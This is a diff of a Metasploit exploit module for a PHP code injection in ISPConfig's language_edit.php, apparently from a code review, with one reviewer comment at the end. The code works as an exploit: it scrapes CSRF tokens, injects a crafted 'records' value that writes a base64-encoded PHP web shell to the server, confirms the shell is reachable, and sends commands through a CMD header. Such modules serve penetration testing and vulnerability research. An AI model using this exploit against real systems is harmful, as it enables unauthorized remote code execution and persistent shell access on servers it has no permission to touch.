modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

```diff
@@ -0,0 +1,237 @@
+    Rex::Text.encode_base64(php_shell)
+  end
+
+  def inject_shell
+    print_status('Injecting PHP shell...')
+    @shell_file = "sh_#{generate_random_string}.php"
+    php_code = generate_shell_code
+    injection = "'];file_put_contents('#{@shell_file}',base64_decode('#{php_code}'));die;#"
+    lang_file = generate_random_string + ".lng"
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    initial_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => initial_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
+    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
+    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
+    unless csrf_id_match && csrf_key_match
+      fail_with(Failure::UnexpectedReply, 'CSRF tokens not found!')
+    end
+    csrf_id = csrf_id_match[1]
+    csrf_key = csrf_key_match[1]
+    print_good("CSRF tokens extracted: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
+    injection_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file,
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'records[\\]' => injection
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => injection_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
+    shell_url = normalize_uri(target_uri.path, 'admin', @shell_file)
+    print_status('Verifying shell injection...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'keep_cookies' => true
+    }, 5)
+    if res && res.body.include?('SHELL_START') && res.body.include?('SHELL_END')
+      print_good("Shell successfully injected: #{@shell_file}")
+      register_file_for_cleanup(@shell_file) if datastore['DELETE_SHELL']
+      return shell_url
+    else
+      fail_with(Failure::UnexpectedReply, 'Shell injection failed or shell not accessible')
+    end
+  end
+
+  def execute_command(command, shell_uri = nil)
+    return nil unless @shell_file
+    shell_url = shell_uri || normalize_uri(target_uri.path, 'admin', @shell_file)
+    encoded_cmd = Rex::Text.encode_base64(command)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'headers' => {
+        'CMD' => encoded_cmd
+      },
+      'keep_cookies' => true
+    }, 15)
+    return nil unless res
+    output_match = res.body.match(/____SHELL_START____(.*?)____SHELL_END____/m)
+    return output_match[1] if output_match
+    nil
+  end
```

Comment:
Once the entire payload is uploaded as the PHP contents, this entire function should be unnecessary.